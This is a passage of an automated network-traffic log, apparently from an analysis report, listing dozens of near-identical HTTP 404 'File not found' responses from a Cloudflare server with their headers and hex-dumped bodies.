                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mzrtz%2FQF0X2cAeLlFJWI2z%2BAeAdP1etxRyi%2Fzh69K%2FYSgYngPgGa4HNOw3eP1bgcepWOE%2BAKIl7reduOnaGLl4kk%2BWu3IHn%2FRDQW%2F3lSf2wT5MlXhnwD0xHzrx7DBQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bc08ddb0ca4-EWRData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m0XsUX3XgZvqZ8dvRLyh0Tae%2BF6G3vfbq6VSoRrdPb6EqohVU517Rv1BktkQ7gY3zOf4LhB%2FtQuwg%2BBYmu0agYCehTM%2BigkcgrqvlaA3agc92h259U8bZQb8hziMMg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bc6b9f342fc-EWRData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5jmRWxvk%2FF%2B7m4F%2FOz1%2BVZYTqYewi9mxwwac1inb6YETltLvovYwz16ZsOGQb9ASpQXM9YTXCCFy%2BzSVe%2F7e%2B71D%2F6iHxEBmGTURdOh%2FWvWN7G4b7RVlOtp2jfoOBw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bcb6815438b-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2FZfHpw5R3M0J12EljDtdW1ytxJT89wzT5CdW7RKt6Pno0EKM%2FCMU0gLB0HcmhNzqoCPVWec6tz725TyuijPkjNt5PPh%2FvNMO%2BvQt1%2BfH5yUXyGLca5TBaoFjvceLg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bd0ed438cd4-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p2U1p7eDkJlqOhs9qnm5NQxCRqFW4eqgljVSCen09hiZ402lhYuyjNq7sj3fnzuCS3V%2FKGdncc%2F%2FLrzcNQLQ0%2Fg8iNfxr0y5ooE6OoGdMVGvj8eaSiTGfxvDiCHAZg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bd69aea42c9-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wioAlAEMbQkipN2MwG8GDiYOseoIotRJd0Rh5QNazVCbbud%2Bq%2B0V4NPdFSBqKbveITUNHwe9VVaLWA5AtV4s2u385MVh0LVIcbtj%2FfMIoXPLvJdcYKT8iA7fqJQ6nw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bdc79374251-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rB9yGoVCx%2FkFD5TN42cUsXMt3ijaSYyGxXAoL6%2BsS37Dr9FDD3gKWRK6dMsTkqT3MwQDY%2F8fZPWB6tIH%2BhizLE%2FoJ4w63V3tXktH9plhQN5PoLzFWqpPAPn9BLpQuw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5be1fbe072bc-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FzvV0zOHIpTP8DVXxLHNBUwLlZGnKeDaMeZXwNEol0fsg3a8xlvRrw%2FHotoF5Vr6crbHMrEicSE4H4eZmSrLwEaJvw6cUo3Zt6EMzbvcynCP8Q1C3UqVDHP0GKAzrA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5be7699a8c29-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E67iXCs2O93RwzjD9kPT1AcB0DOQ7qfQCK1v3u5GnB0J1xm32C9yqFK1D9DmguKcoYTLhSWLqqIPiAoT9%2Fk29Vlex1UTJEcxKO8P62sDAYFfmFWJgfUnEq38%2FGTJCw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5beda9d041e6-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BuiDQ6Svr4d8lCW2K0zjebM%2B16WYG%2BtZHSk3vA4qVzAwlAOXinTcn73eB%2B2rHyEtnfGuD2AxwLQUIDlY6D0oRlkXeebiH9w05NfUR3%2FMG3J05o5IccC4ZDW8H3SRsw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bf2fb4c729f-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DTBvAeC4uqz98Lew63Y7zLv76oS8zLQ%2BNDl2Zxw1p95UMsdCuQdyuUsUbjrWWHlIeybuGKhhJujbLOMfzrpyLpFWflk8M1ESM6MU6QGjwb0i4t68gTo5D02xcolcfw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bf8aef9c337-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJWOZwsYYbnj3hvE7B8LS5yUqCwrjQUKohvihvS8QpacDM3jg%2FMlWqxw%2FeoKBYZtJF6NyRwIOvS3aXQ5mXUOGq52A6Uiis0nBKsdkxTMXD824PCp6gc9R6pkf0pNFg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5bfdb8da3320-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QE9YIl5d%2FC3im0M%2BQBTNxHQux7T2K4cmAJIDu80eMw8C67NnrYTi4FL1g9KIShbzTslME9FaygGpl%2F9s92Ma%2FtfZeEomgKIMDDX2oXuJyW0AnvWhgS5J%2Bk1HqIwndg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c033e370f37-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O1hR8UKxf2PX2BE0NhsdpdLx%2BA9jdawS8%2BstnwWk8b%2BPXQqdhAfldm7uYQFgZ4BxMDLkULk7tnX%2BtSYRys%2FPU2TyZ%2Fw8KfogyfP3PTRhVr5xQmIT7VtGGETyRahU4A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c089e267cf6-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jj8kaF9VMW7WOW%2BApWGzWucOFzNDg4tbbX0xC%2BtYy8v1QFoJKYYNRJ70Or%2FmNkt2LsbErSUwTYc%2BkXlHmEDUmK9KG6Pu0i%2B9LuA1Dy4B3OvdyVoNjPVgcGvCS4Oo9A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c0e08074319-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJJBJgDBK0AOSujO5ipOMwowYULtlw%2B9cUDNPwdeEnxoUw425C5Vt6duFTg8TTE%2FuvWRZ3Hw%2F9kQYMlIcv0VQKCDAjjr%2B6q21sVqwW%2BrwriA9wwCTESoel7FG7h%2BTQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c1429e94382-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G%2FMVh8%2FzavsZ%2F%2B7Vjoi7eSByvQUb%2BHhllcuqWA%2FBCxd3nKqgJrFLx%2FXUb4oQRIEwAzqE5N0DLXEIxdSGORQIwHJ92TGcllCrhBrUTsnir%2Fm9w%2BnsgvQG3QUFhJrmkQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c1a0ba94388-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qq5Cj405RHOFluwRyNentphqjmUqM3hbL344qXMXXrmxzdw%2BWMKHTE0599W2mdjHhLkeeIlSfn92wzcQKyHE5eZcjPUCPq8Xg%2FfTAvFP0oSZ0Fvn0Y4i3t8kfG64rw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c1f7c5e8c12-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LJ2IOR4pOOmPP7cmYLyQt5VX%2BzHvj%2B5ECTDB5tYmomcLO0C10WLyS91Zpx%2FQzMLEIN8sAcGGXueHZNk87lexHcqS8d5zusB%2Bg4dipv4tdfdexbVO1uwjJbIZLiOXwA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c24fedc1986-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dlAjJ8Qg6Ff6%2BgP4TQX37tzjqpqjM9tzK2CQWH17DRMtL6AVe0%2BU7be5hXxd0359%2B5blwEXSy5fHPFmehABuH%2BUfY0WSJ0KMJx7xrDr2iA2VJaV7OPdNnzxGyxxRhw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c2a4ea17d18-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GtT02wdkKW0NiE6Gsijqu4V3%2BjuGyqbIuFoAdXovGJJL%2Bjh0ryKOeDEvO%2FYa4UkzeyXjRMceZBpKsfthTCfIefeSzdu21h2lFmodgkjJNeYmtwOAizvTQmpBL7cusQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c2f5c0c5e76-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CgVtUfzbdU%2BspHap4sRciP6hQpKJST12uEnPafC8Ah5q5%2FHGOjFAuoItHpevTcFXcMtaPUOaFYTgehH6jnar3%2Bldm0lEzsNLIJlY0%2BjdhMAZif2pWDf2eOLeTs0FqA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c357b058c0c-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XuGHxOcWUC0ysvT2VmTBfS8bj%2BItpq%2Bnfr3Abdd6Kkb1RgKifoYmtXFin1Ton75loC9dhkkpZi3XdT4NlQIpjLtKPesn7dPCwpMc0TVo7dYLvwsdHp38cd1Kkjshfg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c3b2d1a0f83-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9SgeCtD74V9z6FzuVFMUtfv6wTty84L8LyRpUr4lsKH7zxkg45vOwo4WmGbN6CUkVAXtFazh75NYDmh52unJ3rZt8R5ddobG7xrKvLKKkB8T3hs5GD5UruE3yc2qQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c427f056a55-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:28:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F0erpvwprs%2F1GlF1S2zhM66LqDqIvZUEp7vYse%2B0lXu9IA8xAFoD%2BDsd3kNo3AqXmG0bPa84CcrzEF6Hasgvz0Q539xRtmuA0HwQYxGpXBz9s1DAUVAG1Cz6rnXv%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c47fdfe4246-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xV%2BB5qD1Yd3zPOgd8f2rP6tfzCIFL18jrdOSkEMQb9vMvMU6PNf8rueozDe7CmOCGiUjv42%2FtwGAmBhvpGkhkZ6uBxedCUNcKGbzFRhiViUxyFg0RsxNx%2FAQMOqzKw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c4e5ef34304-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Y2YrUsCod5f6rEk2RjWB5or%2FgQNV4s2y1c%2FP8h29H%2B0vQjW66XsN2PVCKx7KlJBG1VcVKMGYSFv6584O3X%2BM1dXcdlWwGPthPq6UiQXS9tlpbEl4rTYNZvS628pgA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c548e43c448-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sjaS1C%2B5qyGeUVkysgFhLS7yN4MId4T2nL5Txdh9gKuqS9q6eUDmrXaFKCQY9tysJYdaAqVcMxFIpEOqoVxifdXMdD%2FOOWzoITlpCJcyPc604sG7F1rYn%2FuI0g7NbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c5a1fc3c3f5-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NdkSRxxj5GgSbDnDU4wQjq4kN9vggs1VEHzSjB5NpdNwqH5Qy1whvD2Fvg76FCQ9DsCwHHWRuIXP4tp4TIDH%2F5zHZUi96NURjzQIaCYkVJAOdn%2FbOCYaGlCvkXUug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c5f9f130c8e-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KyxAcmXOfmyZHmlfTUdxE4hEL%2B5fKlmDYmp6L33qxOrVOSVo1rhveg2zpXwYx8Kh1wB%2BgJIca89JvOt37SqCBR8xM92MC1laLkIBZaVtUi8xQKqXj6IlyOHIRyTxNg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c65cbd54368-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7H0voRf4Ea7ANWxnKVc9K4%2FXsB8L8JWatlt%2BTGsZvO42aH2necDqzlj6iAd%2F3fv4umbdItfK2jRLKxN6N70OER6sL9ExURXSEQevKmS4aW2GeKzd0lKyiPXXknDixw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c6b1f0742dc-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FxwbX%2FW%2FSD9KTpSDTVKvqkGZEEloWbfvEP4FdC9czI5fbe4SoAcZjim5TGUJzEBOmwDkVmsbg9CNkGFjLRb01vVxuCcXyzKHd%2BXXHGvRbA87Q5a148kkJ3RO3lX3KQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c702b3d4299-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DIaVLwL3fCDsNslpZyd8seavraM6aeYYT%2FZReyDml5LIXtJupZzOSQZPXNeL0aos34PBBHIpEPeXvwWeBmJahdtyiVkwsstiXA81Ro%2BGOhO2p8P%2B2ZgAg8tf5bY3Vg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c753f0d72a1-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
